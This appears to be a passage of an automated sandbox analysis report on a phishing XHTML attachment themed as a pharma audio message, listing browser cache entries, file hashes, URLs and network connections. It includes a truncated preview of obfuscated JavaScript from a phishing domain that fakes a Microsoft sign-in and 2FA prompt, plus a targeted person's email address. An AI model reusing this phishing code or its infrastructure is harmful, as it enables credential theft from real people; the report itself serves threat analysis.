SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 63

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
Category:	downloaded
Size (bytes):	68421
Entropy (8bit):	4.894526489503226
Encrypted:	false
SSDEEP:	768:PO6TtTOT+Th6dO31GqjkKB6wI7JoHHy6BKJwhXBXoXRn2CVWpgnEDUgUoCn4CSaY:PO65yCYyB6F5/VW4HllbE
MD5:	95433AD6C822F912C3EC20D7D0324453
SHA1:	DD09149B83F227F46EBE417D5E55C25A8E5B718C
SHA-256:	3EAA119BDC8067E28626DD3E81A085ACF0F6C2EB6043DB1FEA164F5703CB5E71
SHA-512:	F20107C5DE6BFFB843CF3961EFEE83FCEB45F87DE204F53E55553342F959F23AED2A334B1C970E2B358CC7F1B72789EB84A6D05AD0E8C071B027168F62881D4F
Malicious:	false
URL:	https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Preview:	function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disabled','ajax','text','An\x20error\x20occurred\x20while\x20verifying\x20the\x20code.\x20Please\x20try\x20again.','#msg-2fa','Enter\x20your\x20email\x20address\x20or\x20phone\x20number.','#co','href','pointer-events','querySelector','input','div4','now','button:not(#dummy-bot-trap)','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-16px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x22ep\x22\x20class=\

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	22
Entropy (8bit):	3.5726236638951625
Encrypted:	false
SSDEEP:	3:YM0CKPFY:YM0xPi
MD5:	BAFC2F4C3A0599F66B6BACD96A1AE14F
SHA1:	4403E01E319E32CD05A5860FCE7AA81DE01F3B14
SHA-256:	1EAEB5F2EB261F058FD5AD84C44C5803417D64D24CA3C5F9DF760003D0337207
SHA-512:	60FAEDC7B805F73720FF62BE8B758787C397F7DD6330C4B46FB115C58B50B6C8664C668B923695D845A0DA8614905835B5ED390C5716685AF559DF6FAF5D7696
Malicious:	false
Preview:	{"ip":"45.92.229.138"}

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	258966
Entropy (8bit):	4.694760038815572
Encrypted:	false
SSDEEP:	1536:Pq6wJpJW3jInCU77Pc5ybMMHcFdL5RdD0BKt2AnsD5FWXxXLXv47pGXRMN6o8VbB:dLzsCXo8cAcfO4FIwo7vwI7N
MD5:	D22C8D1F87B47309F3C2A05D2905A762
SHA1:	2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
SHA-256:	CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
SHA-512:	F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
Malicious:	false
URL:	https://sender.linxcoded.top/start/xls/includes/css6.css
Preview:	/!.. Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 67

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Static File Info

General

File type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Entropy (8bit):	4.757488908475143
TrID:	HyperText Markup Language (15004/1) 83.32% Text - UTF-8 encoded (3003/1) 16.68%
File name:	#Ud83d#Udd0aAudio_Msg Pharma.xhtml
File size:	2'840 bytes
MD5:	d97e1feefbffc8d82562a10b3dde201b
SHA1:	c97780ed0765a904afbfe0ef8297d1885a8bc0b2
SHA256:	6e3c117ebc04ceda9a13734a6fa6b7258fd6e4da711806b3e7b236a26866f3e2
SHA512:	777a30ad44d385b4ee57636c5fa131a7eb13eb43c248eae3ca0582120358e7000204fcb8d348e38413e3bc83e63f4f42f802000c9c506c3da07c42f923345140
SSDEEP:	48:3VmIAqytjBA2QD0oCFEvDvcWScicrlqlTSAo0+LPk:VA/qAfa/SKlqEAOM
TLSH:	285153589DD1868000B18361E7FBE318FD6202971200CA447DCDF2565FB9FCD85ABEE8
File Content Preview:	...<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN".. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" lang="en">..<head>.. <meta http-

File Icon


Icon Hash:	173149cccc490307

Static OLE Info

General

Document Type:	Text
Number of OLE Files:	1

OLE File "#Ud83d#Udd0aAudio_Msg Pharma.xhtml"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 280
• 8248 undefined
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2025 19:07:25.130289078 CET	49699	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.130369902 CET	443	49699	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.130456924 CET	49699	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.130800009 CET	49699	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.130837917 CET	443	49699	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.251770973 CET	49705	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.251872063 CET	443	49705	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.251956940 CET	49705	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.252377987 CET	49705	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.252413988 CET	443	49705	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.325843096 CET	49699	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.325889111 CET	49705	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.326817036 CET	49707	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.326852083 CET	443	49707	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.326901913 CET	49707	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.328193903 CET	49707	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.328206062 CET	443	49707	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.368273020 CET	443	49699	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.368314028 CET	443	49705	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.545901060 CET	443	49699	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.546003103 CET	49699	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.546041012 CET	49699	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.656310081 CET	443	49705	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.656435966 CET	49705	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.656436920 CET	49705	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.677757978 CET	49707	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.678343058 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.678414106 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.678529024 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.678703070 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.678734064 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.720314026 CET	443	49707	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.737950087 CET	443	49707	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:25.738049030 CET	49707	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:25.738075018 CET	49707	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.086642027 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.086736917 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.087858915 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.087882042 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.088335991 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.088615894 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.132280111 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.678734064 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.678793907 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.678833961 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.678888083 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.678925991 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.678944111 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.678955078 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.678977966 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.678987980 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.679014921 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.679017067 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.679042101 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.679061890 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.679080009 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.679111004 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.877190113 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.877239943 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.877393961 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.877393961 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.877427101 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.877839088 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.877887964 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.877917051 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.877928972 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.877958059 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.877975941 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.877990961 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.878001928 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.878027916 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.878120899 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.878185034 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.878257990 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.878273010 CET	443	49711	139.28.36.38	192.168.2.16
Mar 27, 2025 19:07:26.878297091 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.878318071 CET	49711	443	192.168.2.16	139.28.36.38
Mar 27, 2025 19:07:26.973094940 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:26.973181963 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:26.976324081 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:26.976511002 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:26.976524115 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.331491947 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.331590891 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.332637072 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.332650900 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.333161116 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.336479902 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.380265951 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.810486078 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.810542107 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.810590982 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.810647011 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.810709000 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.810744047 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.810744047 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.810771942 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.810786009 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.810816050 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.810822010 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.810832977 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.810849905 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.810889006 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.810911894 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.974598885 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.974728107 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.974859953 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.974859953 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.974910021 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.974941969 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.974980116 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.975001097 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.975022078 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.975028038 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:27.975070953 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:27.975094080 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.018912077 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.018958092 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.019048929 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.019094944 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.019125938 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.019159079 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.139844894 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.139889956 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.140010118 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.140067101 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.140100956 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.140124083 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.140141010 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.140186071 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.140218019 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.140229940 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.140279055 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.140297890 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.183329105 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.183373928 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.183509111 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.183509111 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.183540106 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.183600903 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.183752060 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.183795929 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.183819056 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.183825970 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.183856010 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.183875084 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.303747892 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.303801060 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.303914070 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.303958893 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.303966045 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.303987026 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.304033995 CET	443	49714	185.174.100.20	192.168.2.16
Mar 27, 2025 19:07:28.304040909 CET	49714	443	192.168.2.16	185.174.100.20
Mar 27, 2025 19:07:28.304060936 CET	49714	443	192.168.2.16	185.174.100.20
